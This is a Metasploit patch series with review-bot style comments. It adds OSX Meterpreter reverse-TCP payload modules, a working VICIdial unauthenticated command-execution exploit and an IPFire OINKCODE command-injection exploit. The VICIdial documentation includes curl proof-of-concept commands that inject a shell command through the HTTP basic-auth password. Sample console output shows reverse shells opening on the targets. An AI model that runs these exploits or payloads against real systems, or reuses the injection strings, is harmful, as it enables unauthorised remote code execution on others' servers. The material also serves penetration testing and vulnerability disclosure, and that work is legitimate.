From d333077308e865034571a46a3fe9375612c2a57b Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 23 May 2017 09:47:23 +0800 Subject: [PATCH 01/63] osx meterpreter --- lib/msf/base/sessions/meterpreter_x64_osx.rb | 29 ++++++++++++++ lib/msf/util/exe.rb | 28 ++++++++----- .../osx/x64/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++ 3 files changed, 87 insertions(+), 10 deletions(-) create mode 100644 lib/msf/base/sessions/meterpreter_x64_osx.rb create mode 100644 modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_x64_osx.rb b/lib/msf/base/sessions/meterpreter_x64_osx.rb new file mode 100644 index 0000000000..2e507e9055 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x64_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X64 + end +end + +end +end + diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d41f3876e7..d05f043ed7 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender' # @return [String] # @return [NilClass] def self.to_executable(framework, arch, plat, code = '', opts = {}) - if elf? code + if elf? code or macho? code return code end 
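Review bot: `supports_ssl?` and `supports_zlib?` in `Meterpreter_x64_OSX` both hard-return `false` with no explanation, so a reader cannot tell whether this is a transport limitation of the Mettle build or a temporary stub; a one-line comment above each, e.g. `# SSL/zlib are disabled for this session type; see the mettle OSX transport before changing`, would record the intent, since nothing in the hunk shows the reason. Style-wise the three methods are run together without blank lines and `opts={}` lacks the conventional spacing (`opts = {}`). The same points apply verbatim to `Meterpreter_x86_OSX` in the third patch of this series, which differs only in `self.base_arch = ARCH_X86`; if the session-class convention permits, a shared superclass parameterised on the arch would remove the duplicate.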
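Review bot: The new condition `if elf? code or macho? code` in `to_executable` uses the keyword `or`, which binds looser than `||` and is the form the Ruby style guide reserves for control flow; write it as `if elf?(code) || macho?(code)`. The early return now hands a caller-supplied Mach-O blob back regardless of the `arch` and `plat` arguments, so a mismatch between the requested platform and the blob goes unreported — a comment such as `# Pre-built ELF/Mach-O input is returned untouched; arch/plat are not validated against it` would make that explicit. The body of `to_executable` continues outside the hunk.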
@@ -2122,15 +2122,19 @@ require 'msf/core/exe/segment_appender' end end when 'macho', 'osx-app' - macho = case arch - when ARCH_X86,nil - to_osx_x86_macho(framework, code, exeopts) - when ARCH_X64 - to_osx_x64_macho(framework, code, exeopts) - when ARCH_ARMLE - to_osx_arm_macho(framework, code, exeopts) - when ARCH_PPC - to_osx_ppc_macho(framework, code, exeopts) + if macho? code + macho = code + else + macho = case arch + when ARCH_X86,nil + to_osx_x86_macho(framework, code, exeopts) + when ARCH_X64 + to_osx_x64_macho(framework, code, exeopts) + when ARCH_ARMLE + to_osx_arm_macho(framework, code, exeopts) + when ARCH_PPC + to_osx_ppc_macho(framework, code, exeopts) + end end fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho when 'vba' @@ -2258,6 +2262,10 @@ require 'msf/core/exe/segment_appender' code[0..3] == "\x7FELF" end + def self.macho?(code) + code[0..3] == "\xCF\xFA\xED\xFE" + end + end end end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..dbb741e67c --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb 
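Review bot: The passthrough `macho = code` in the `'macho', 'osx-app'` branch skips the `arch` dispatch entirely, so whatever blob satisfies `macho?` is handed to `to_osx_app` without any check that it matches the requested `arch`; that is presumably intended, but deserves a comment like `# Caller supplied a Mach-O already; use it as-is and skip arch-specific generation`. Stylistically the `if`/`else` that assigns `macho` in both arms reads more naturally as one expression, `macho = macho?(code) ? code : case arch ... end`. The enclosing `case fmt` starts and ends outside the hunk.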
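Review bot: `code[0..3] == "\xCF\xFA\xED\xFE"` in the new `macho?` compares four characters, not four bytes, and Ruby's `String#==` returns false when both operands hold non-ASCII bytes in incompatible encodings; unless `exe.rb` is declared `# -*- coding: binary -*-` (not visible here), a UTF-8 literal will never equal the first bytes of a binary payload buffer, whereas the pre-existing `elf?` is unaffected because `"\x7FELF"` is pure ASCII. A byte-level comparison, `code.byteslice(0, 4) == "\xCF\xFA\xED\xFE".b`, sidesteps the encoding question; the same applies to the extended check in the sixth patch of this series (`update macho check for 32bit + fat`). A short doc comment naming the magic, `# 0xFEEDFACF (MH_MAGIC_64) as stored little-endian on disk`, would also help the next reader.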
@@ -0,0 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end From a9e6df6f158b375ad2da721f467902df8bfdba34 Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 26 May 2017 15:55:14 +0800 Subject: [PATCH 02/63] fix shell command on osx meterpreter --- .../meterpreter/ui/console/command_dispatcher/stdapi/sys.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index acfe737328..774617bcbe 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb 
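Review bot: The module's `'Name'` is `'OSX Meterpreter, Reverse TCP Inline'` with no architecture in it, and the i386 module added in the third patch reuses the identical string, so the two are indistinguishable in `search` output and module listings; `'OSX Meterpreter x64, Reverse TCP Inline'` here (and `x86` for the sibling) would disambiguate. Minor style: `opts = {scheme: 'tcp'}` wants spaces inside the braces and `.to_binary :exec` wants parentheses, `.to_binary(:exec)`. The `'Author'` entries end in a trailing space, which looks like an e-mail address lost in transit — worth confirming against the original file.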
@@ -257,7 +257,7 @@ class Console::CommandDispatcher::Stdapi::Sys print_error( "Failed to spawn shell with thread impersonation. Retrying without it." ) cmd_execute("-f", path, "-c", "-H", "-i") end - when 'linux' + when 'linux', 'osx' # Don't expand_path() this because it's literal anyway path = "/bin/sh" cmd_execute("-f", path, "-c", "-i") From 1582d3a90261aa2e03d6f7e73dffbb98b48ba25e Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 26 May 2017 15:55:42 +0800 Subject: [PATCH 03/63] support i386 --- lib/msf/base/sessions/meterpreter_x86_osx.rb | 29 ++++++++++++++ .../osx/x86/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 lib/msf/base/sessions/meterpreter_x86_osx.rb create mode 100644 modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_x86_osx.rb b/lib/msf/base/sessions/meterpreter_x86_osx.rb new file mode 100644 index 0000000000..c7e25efac9 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x86_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X86 + end +end + +end +end + diff --git a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..756e3f5e73 --- /dev/null +++ b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb 
@@ -0,0 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x86_osx' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_OSX + ) + ) + end + + def generate + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec + end +end From 018e544295cfb84db0699890d02a4fca290f8da8 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 27 May 2017 05:09:38 +0000 Subject: [PATCH 04/63] Add VICIdial user_authorization Unauthenticated Command Execution module --- ...dial_user_authorization_unauth_cmd_exec.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb diff --git a/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb new file mode 100644 index 0000000000..42f5bc6090 --- /dev/null +++ b/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb 
@@ -0,0 +1,112 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VICIdial user_authorization Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in VICIdial versions + 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users + to execute arbitrary operating system commands as the web + server user if password encryption is enabled (disabled + by default). + + When password encryption is enabled the user's password + supplied using HTTP basic authentication is used in a call + to exec(). + + This module has been tested successfully on version 2.11 RC2 + and 2.13 RC1 on CentOS. + }, + 'License' => MSF_LICENSE, + 'Author' => 'Brendan Coles ', + 'References' => + [ + ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + # HTTP Basic authentication password + 'Space' => 2048, + # apostrophe ('), quote ("), semi-colon (;) and backslash (\) + # are removed by preg_replace + 'BadChars' => "\x00\x0A\x22\x27\x3B\x5C", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl python netcat' + } + }, + 'Targets' => [[ 'Automatic Targeting', {} ]], + 'Privileged' => false, + 'DisclosureDate' => 'May 26 2017', + 'DefaultTarget' => 0)) + register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ]) + deregister_options('USERNAME', 'PASSWORD') + end + + def check + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}&#" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + unless 
res + vprint_status 'Connection failed' + return CheckCode::Unknown + end + + if res.code != 401 + vprint_status "#{peer} Unexpected reply. Expected authentication failure." + return CheckCode::Safe + end + + # Check for input filtering of '#' and '&' characters in password + # Response for invalid credentials is in the form of: |||BAD| + if res.body !~ /\|#{user}\|#{pass}\|BAD\|/ + vprint_status "#{peer} Target is patched." + return CheckCode::Safe + end + + # Check for ../agc/bp.pl password encryption script + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl') + if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/ + vprint_status "#{peer} Password encryption is supported, but may not be enabled." + return CheckCode::Appears + end + + vprint_status "#{peer} Could not verify whether password encryption is supported." + CheckCode::Detected + end + + def execute_command(cmd, opts = {}) + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #" + + print_status "#{peer} Sending payload (#{cmd.length} bytes)" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + if !res + fail_with(Failure::Unreachable, 'Connection failed') + elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/ + print_good "#{peer} Payload sent successfully" + else + fail_with(Failure::UnexpectedReply, 'Unexpected reply') + end + end + + def exploit + execute_command(payload.encoded) + end +end From dfb5806dcb623d11f9621961068181abb1badc6d Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 28 May 2017 03:08:45 +0000 Subject: [PATCH 05/63] Add documentation --- ...dial_user_authorization_unauth_cmd_exec.md | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md 
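Review bot: `res.body !~ /\|#{user}\|#{pass}\|BAD\|/` in `check`, and the `=~ /#{user}/` match in `execute_command`, interpolate generated values straight into regex literals; `user` is alphabetic here, but `pass` carries `&#` and any later change to how these strings are built would silently alter the pattern, so wrap them as `Regexp.escape(user)` and `Regexp.escape(pass)`. In `check`, every non-401 response is reported as `CheckCode::Safe`, which overstates what is known — a 404 or 500 says nothing about the patch state, and `CheckCode::Unknown` is the honest answer for those. The `rand(10) + 5` idiom reads better as `rand(5..14)`.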
diff --git a/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md b/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md new file mode 100644 index 0000000000..708867cde1 --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md 
@@ -0,0 +1,133 @@ +## Description + + This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default). + + When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`. + + This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS. + + +## Vulnerable Application + + VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. + + This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS. + + Installers: + + * [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download) + * [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download) + + Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt). + + +## Technical Details + + The `functions.php` file defines a function called `user_authorization`: + + ```php + function user_authorization($user,$pass,$user_option,$user_update) + ``` + + This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function: + + ```php + if ($SSpass_hash_enabled > 0) + { + if (file_exists("../agc/bp.pl")) + {$pass_hash = exec("../agc/bp.pl --pass=$pass");} + else + {$pass_hash = exec("../../agc/bp.pl --pass=$pass");} + ``` + + A rudimentary blacklist is used to prevent command injection. 
The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so: + + ```php + $user = preg_replace("/\'|\"|\\\\|;/","",$user); + $pass = preg_replace("/\'|\"|\\\\|;/","",$pass); + ``` + + It is trivial to bypass the blacklist. + + For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands. + + For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase: + + ```php + $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER); + $PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW); + ``` + + However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation: + + * help.php + * vicidial_sales_viewer.php + + In VICIdial version 2.13RC1, at least one file did not make use of the additional validation: + + * vicidial_sales_viewer.php + + This vulnerability was patched in revision 2759. + + +## Proof of Concept + + ```bash + $ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \ + --user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #' + ``` + + ```bash + $ curl -isk "https://VICIdial.local/vicidial/help.php" \ + --user 'anyusername:anypassword& id>/tmp/pwned_by_help #' + ``` + + Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command. + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec` + 3. Do: `set rhost [IP]` + 4. Do: `run` + 5. 
You should get a session + + +## Sample Output + + ``` + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check + [*] 172.16.191.150:80 The target appears to be vulnerable. + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] 172.16.191.150:80 Sending payload (505 bytes) + [+] 172.16.191.150:80 Payload sent successfully + [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400 + + id + uid=48(apache) gid=48(apache) groups=48(apache) + ``` + + +## Sample Output (Verbose) + + ``` + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true + verbose => true + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check + + [*] 172.16.191.150:80 Password encryption is supported, but may not be enabled. + [*] 172.16.191.150:80 The target appears to be vulnerable. + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] 172.16.191.150:80 Sending payload (505 bytes) + [+] 172.16.191.150:80 Payload sent successfully + [*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400 + + id + uid=48(apache) gid=48(apache) groups=48(apache) + ``` + From 32a83e0d30eeb4c8c2372d90620f2153d293dafe Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 30 May 2017 14:00:24 +0800 Subject: [PATCH 06/63] update macho check for 32bit + fat --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d05f043ed7..9bbaba952e 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -2263,7 +2263,7 @@ require 'msf/core/exe/segment_appender' end def self.macho?(code) - code[0..3] == "\xCF\xFA\xED\xFE" + code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE" end end 
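Review bot: `code[0..3]` is sliced three times on one line in `macho?` and the three magics are bare literals; hoisting them into a frozen constant, `MACHO_MAGICS = ["\xCF\xFA\xED\xFE", "\xCE\xFA\xED\xFE", "\xCA\xFE\xBA\xBE"].freeze`, and writing `MACHO_MAGICS.include?(code[0..3])` makes the check self-documenting. The fat-binary magic `\xCA\xFE\xBA\xBE` is also the magic of Java class files, so a `.class` blob now satisfies `macho?` and is returned untouched by `to_executable`; at minimum a comment should record that, `# CAFEBABE is shared with Java class files; macho? alone cannot tell them apart`.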
From c35dffc6488200aef9443d1a2675bfee1b6b2026 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 14 Jun 2017 08:04:17 -0400 Subject: [PATCH 07/63] first draft of oinkcode --- .../linux/http/ipfire_oinkcode_exec.rb | 111 ++++++++++++++++++ 1 file changed, 111 insertions(+) create mode 100644 modules/exploits/linux/http/ipfire_oinkcode_exec.rb diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb new file mode 100644 index 0000000000..57c1d8a0bf --- /dev/null +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb 
@@ -0,0 +1,111 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'IPFire proxy.cgi RCE', + 'Description' => %q( + IPFire, a free linux based open source firewall distribution, + version < 2.19 Update Core 110 contains a remote command execution + vulnerability in the ids.cgi page in the OINKCODE field. + ), + 'Author' => + [ + 'h00die ', # module + '0x09AL' # discovery + ], + 'References' => + [ + [ 'EDB', '42149' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => { 'SSL' => true }, + 'Arch' => [ ARCH_CMD ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl awk openssl' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 09 2016' + ) + ) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']), + Opt::RPORT(444) + ], self.class + ) + end + + def check + begin + res = send_request_cgi( + 'uri' => '/cgi-bin/pakfire.cgi', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? 
+ fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body + + if version && update && version == "2.19" && update.to_i <= 110 + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + + res = send_request_cgi( + 'uri' => '/cgi-bin/ids.cgi', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'headers' => + { + 'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" + }, + 'data' => { + 'ENABLE_SNORT_GREEN' => 'on', + 'ENABLE_SNORT' => 'on', + 'RULES' => 'registered', + 'OINKCODE' => "`#{payload.encoded}`", + 'ACTION' => 'Download new ruleset', + 'ACTION2' => 'snort' + }, + ) + + # success means we hang our session, and wont get back a response + if res + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + end + + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end From 46ffd250a04422b87d3a3c957f546a13606c66b3 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 14 Jun 2017 21:15:56 -0400 Subject: [PATCH 08/63] module working and docs --- .../linux/http/ipfire_oinkcode_exec.md | 48 +++++++++++++++++++ .../linux/http/ipfire_oinkcode_exec.rb | 11 +++-- 2 files changed, 56 insertions(+), 3 deletions(-) create mode 100644 documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md diff --git a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md new file mode 100644 index 0000000000..c6ead925f9 
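Review bot: `check` calls `fail_with` on a nil response, on any non-200 code, and in its `rescue ::Rex::ConnectionError`, which raises out of the check path instead of returning a `CheckCode`; `check` should return `CheckCode::Unknown` in those cases and leave `fail_with` to `exploit`. The non-200 branch also labels every status as `Invalid credentials`, but a 404 or 500 is not a credential failure, so `"Unexpected response code #{res.code}"` is the accurate message. The header comment uses `##`/`###` rather than the `##` / `#` / `##` framing the other new modules in this series use.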
--- /dev/null +++ b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md @@ -0,0 +1,48 @@ +## Vulnerable Application + + Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso) + +This module has been verified against: + +1. 2.19 core 100 +2. 2.19 core 110 (exploit-db, not metasploit module) + +## Verification Steps + + 1. Install the firewall + 2. Start msfconsole + 3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec``` + 4. Do: ```set password admin``` or whatever it was set to at install + 5. Do: ```set rhost 10.10.10.10``` + 6. Do: ```set payload cmd/unix/reverse_perl``` + 7. Do: ```set lhost 192.168.2.229``` + 8. Do: ```exploit``` + 9. You should get a shell. + +## Options + + **PASSWORD** + + Password is set at install. May be blank, 'admin', or 'ipfire'. + +## Scenarios + + ``` + msf > use exploit/linux/http/ipfire_oinkcode_exec + msf exploit(ipfire_oinkcode_exec) > set password admin + password => admin + msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201 + rhost => 192.168.2.201 + msf exploit(ipfire_oinkcode_exec) > set verbose true + verbose => true + msf exploit(ipfire_oinkcode_exec) > check + [*] 192.168.2.201:444 The target appears to be vulnerable. + msf exploit(ipfire_oinkcode_exec) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400 + id + uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid) + whoami + nobody + ``` \ No newline at end of file diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index 57c1d8a0bf..4057efc333 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb 
@@ -59,9 +59,12 @@ class MetasploitModule < Msf::Exploit::Remote def check begin + # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 + # after a chat with @bcoles in IRC. res = send_request_cgi( 'uri' => '/cgi-bin/pakfire.cgi', - 'method' => 'GET' + 'method' => 'GET', + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 @@ -79,16 +82,18 @@ class MetasploitModule < Msf::Exploit::Remote def exploit begin - + # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 + # after a chat with @bcoles in IRC. res = send_request_cgi( 'uri' => '/cgi-bin/ids.cgi', 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' => { 'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, - 'data' => { + 'vars_post' => { 'ENABLE_SNORT_GREEN' => 'on', 'ENABLE_SNORT' => 'on', 'RULES' => 'registered', From e005e51f05d8784689395d93f284d48cc428fffa Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 16 Jun 2017 06:48:31 -0400 Subject: [PATCH 09/63] some edits finished --- .../linux/http/ipfire_oinkcode_exec.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index 4057efc333..e4ad96b6ce 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb 
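Review bot: The `# authorization header required ...` comment and `basic_auth(datastore['USERNAME'], datastore['PASSWORD'])` are now duplicated verbatim between `check` and `exploit`; a small private helper, `def auth_header; basic_auth(datastore['USERNAME'], datastore['PASSWORD']); end`, called from both keeps them in step. The comment's "after a chat with @bcoles in IRC" is provenance rather than explanation — keep the PR link and state the reason in one clause, e.g. `# pakfire.cgi and ids.cgi sit behind HTTP basic auth, so credentials go on every request`. Both enclosing methods continue outside their hunks.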
